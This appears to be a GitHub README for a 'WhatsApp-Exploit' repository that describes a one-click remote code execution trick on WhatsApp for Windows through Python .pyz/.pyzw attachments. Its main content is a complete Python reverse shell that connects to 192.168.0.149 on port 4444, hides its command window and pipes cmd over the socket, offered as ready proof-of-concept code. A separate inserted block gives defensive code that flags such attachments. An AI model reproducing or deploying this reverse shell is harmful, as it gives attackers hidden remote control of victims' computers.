chilumine / WhatsApp-Exploit

1-Click RCE via WhatsApp For Windows

WhatsApp’s “One-Click” Security Flaw: How to Exploit It

Hello Hackers,

WhatsApp is clearly doing an outstanding job with their security, so much so that they’re not worried about minor flaws. For example, I reported a flaw that lets attackers get into your system just by clicking "Open" on a malicious file. You’d think this would be a big issue, but WhatsApp seems to think it’s no big deal.

When I pointed this out, they didn’t seem too concerned. Instead of fixing the issue, they were more focused on other things. And in a stunning display of security priorities, BleepingComputer revealed that WhatsApp has no plans to block Python scripts. Because of course Python scripts are totally harmless and not worth worrying about!

So, I think it’s absolutely fine to share the PoC code, which is really very simple. Here’s an example of reverse shell code, which can be saved with a .pyz or .pyzw extension: Python zip archives that work just like regular zip files but can also be executed directly. Python can import modules from these zip files just like from a subdirectory.
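As an added defender-side example (not part of the original PoC or the author's code): a small Python check that flags attachments carrying the .pyz/.pyzw extensions described above, and also spots a Python zipapp (a zip with a top-level __main__.py, optionally prefixed by a shebang line) hiding behind another extension. The extension set and the sample files it classifies are constructed for this example.

```python
import io
import pathlib
import tempfile
import zipfile

# Extensions the Windows Python launcher runs directly; assumed here to be the
# ones the write-up above says WhatsApp does not block (constructed set).
RISKY_EXTENSIONS = {".pyz", ".pyzw"}

def is_python_zipapp(path: str) -> bool:
    """True if path is a zip archive with a top-level __main__.py. A shebang
    line before the zip data does not hide it: zipfile finds the archive
    from its end-of-central-directory record, just as the interpreter does."""
    if not zipfile.is_zipfile(path):
        return False
    with zipfile.ZipFile(path) as zf:
        return "__main__.py" in zf.namelist()

def classify_attachment(path: str) -> str:
    """Return 'block', 'suspicious' or 'allow' for a received attachment."""
    ext = pathlib.Path(path).suffix.lower()
    if ext in RISKY_EXTENSIONS:
        return "block"        # "Open" hands it to the launcher, whatever it holds
    if is_python_zipapp(path):
        return "suspicious"   # zipapp content hiding behind another extension
    return "allow"

def make_sample(dirpath: str, name: str, shebang: bool = False) -> str:
    """Write a constructed, benign zipapp-style file used only by demo()."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("__main__.py", "print('benign sample')\n")
    prefix = b"#!/usr/bin/env python3\n" if shebang else b""
    path = pathlib.Path(dirpath) / name
    path.write_bytes(prefix + buf.getvalue())
    return str(path)

def demo() -> dict:
    """Classify four constructed samples; returns {filename: verdict}."""
    with tempfile.TemporaryDirectory() as d:
        paths = {n: make_sample(d, n, shebang=n.endswith(".pyzw"))
                 for n in ("notes.pyz", "invoice.pyzw", "photos.zip")}
        txt = pathlib.Path(d, "readme.txt")
        txt.write_text("plain text\n")
        paths["readme.txt"] = str(txt)
        return {n: classify_attachment(p) for n, p in paths.items()}

if __name__ == "__main__":
    print(demo())
```

The same content check works on any download directory, not only on files with a telltale extension, since a renamed zipapp still carries its __main__.py.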

Note: Defense evasion techniques are out of scope for this example.

Here is a video PoC:

For more details on the security gap, check out this BleepingComputer post.

Example: Reverse Shell on IP 192.168.0.149 on Port 4444

```python
import os
import socket
import subprocess
import threading

def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.149", 4444))

# Set up startupinfo to hide the command prompt window
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE

p = subprocess.Popen(
    ["cmd"],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    stdin=subprocess.PIPE,
    startupinfo=startupinfo
)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```